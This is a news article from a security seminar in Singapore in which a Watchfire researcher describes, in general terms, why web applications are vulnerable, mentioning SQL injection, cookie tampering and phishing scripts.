SINGAPORE--If you think your Web applications are secure, think again.
According to Mass.-based Watchfire, the most vulnerable area in the enterprise information ecosystem is Web applications. The company specializes in software and services to audit the security and regulatory compliance of Web sites.
Danny Allan, Watchfire's director of strategic research, noted that network perimeters bore the brunt of attacks in the past. Given that networks today are adequately protected by a range of security tools, Web applications are now not only easier to target, they are also linked to backend servers and databases containing a wealth of information.
However, businesses are currently not spending enough to protect their Web applications, Allan told ZDNet Asia this week, on the sidelines of the Governmentware 2006 seminar in Singapore. Citing research by Gartner, he pointed out that 90 percent of IT security spending is on network protection and only 10 percent is spent on Web applications.
The same research also revealed that two-thirds of all Web applications are vulnerable, he said. The reason: Web applications are not designed correctly and businesses are not aware of that flaw, Allan said. In fact, there is a tradeoff between making it user-friendly and making it more secure.
Allan explained: "There are no firewalls or intrusion detection systems [protecting] Web applications. A Web application [for example], doesn't know I'm allowed to save cookie X but not cookie Y.
"In order to secure Web applications, you need to know all the entry points," he said. "No systems administrator knows all the entry points…he didn't build those applications."
Entry points, or attack surface, to a dynamic Web site could be as many as 100 times the number of pages. In comparison, the number of entry points on a static information site could be lower than a factor of 10, he said.
"The sites that you can interact with are the ones that have the most sensitive information," noted Allan. "Any Web site that allows [a user] to contribute content is a potential target." Online forums that do not "sanitize" posted content, for example, are at risk.
There are various ways for cyber criminals to deliver their payload, such as by changing the cookie settings so that it reflects another person is using the system. Attackers can also make use of a process known as SQL (Structured Query Language) injection to steal data. This means that the browser is made to execute scripts that manipulate and retrieve data from databases.
Another scenario would be a phishing e-mail sent to an unsuspecting user who clicks on the URL that contains a hidden malicious script from a staging site, from which attackers are able to view login details and all keystrokes, and can even communicate with the victim real-time via a pop-up window.
For example, the victim may receive a message asking him to key in his credit card number during an online banking session. Once the attacker secures the user credentials, he can change the cookie to escalate his privileges to that of an administrator, thus causing even more damage.
Having signed certificates is of no help, either, Allan pointed out. The SSL (Secure Sockets Layer) system "offers no protection", and attackers would prefer to target encrypted systems as such sites mislead users into thinking they are more secure.
The danger does not usually reside at Internet giants such as Google and Yahoo, that have the resources to tackle issues with their Web applications. Rather, it is the banks and other larger enterprises that face security risks, noted Allan.
It is not a doomsday scenario though, he said. The good news is that it takes more than the average Joe to be able to steal the data, said Allan. "It's not something that a 12-year-old in the basement would do," he said.
The threat is, however, very real. According to Allan, a Russian blog entry revealed that on average, about 2 percent of 2 million users are tricked into scams that wrongfully obtain their sensitive data or login and password details.